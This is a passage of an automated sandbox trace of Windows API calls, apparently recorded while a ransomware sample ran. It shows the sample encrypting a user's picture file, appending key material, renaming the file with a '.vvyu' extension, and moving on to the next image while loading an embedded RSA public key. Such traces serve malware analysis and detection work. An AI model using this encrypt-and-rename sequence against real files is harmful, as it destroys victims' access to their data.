dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0191.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6068 [0191.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6008 [0191.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fd8 [0191.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af36f0 | out: hHeap=0x2c0000) returned 1 [0191.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.173] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x9160, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9160, lpOverlapped=0x0) returned 1 [0191.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.174] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9165, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.174] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.175] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.176] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.176] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.176] CloseHandle (hObject=0x584) returned 1 [0191.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0191.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0191.178] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\QG2UxZ3cw8a4fuoL_L.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\qg2uxz3cw8a4fuol_l.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\QG2UxZ3cw8a4fuoL_L.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\qg2uxz3cw8a4fuol_l.gif.vvyu")) returned 1 [0191.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.179] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.182] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52256fa0, ftCreationTime.dwHighDateTime=0x1d89978, ftLastAccessTime.dwLowDateTime=0xe5a50c50, ftLastAccessTime.dwHighDateTime=0x1d8a070, ftLastWriteTime.dwLowDateTime=0xe5a50c50, ftLastWriteTime.dwHighDateTime=0x1d8a070, nFileSizeHigh=0x0, nFileSizeLow=0x18541, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rWx9qkj.png", cAlternateFileName="")) returned 1 [0191.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af36f0 [0191.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0191.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af36f0 | out: hHeap=0x2c0000) returned 1 [0191.183] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\rWx9qkj.png") returned=".png" [0191.183] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\rWx9qkj.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\rwx9qkj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.183] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=99649) returned 1 [0191.183] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.187] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1851b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.187] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.190] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.190] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x18541, lpOverlapped=0x0) returned 1 [0191.191] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.191] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.191] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.191] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.192] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.192] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.192] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.192] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.192] GetLastError () returned 0x0 [0191.192] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.192] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.193] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.193] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.193] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18540) returned 0x2af5168 [0191.194] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af36f0 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3738 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.194] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0191.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6008 [0191.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5ff0 [0191.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0191.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0191.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.199] GetCurrentThreadId () returned 0x5d8 [0191.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5898 [0191.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.200] GetCurrentThreadId () returned 0x5d8 [0191.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 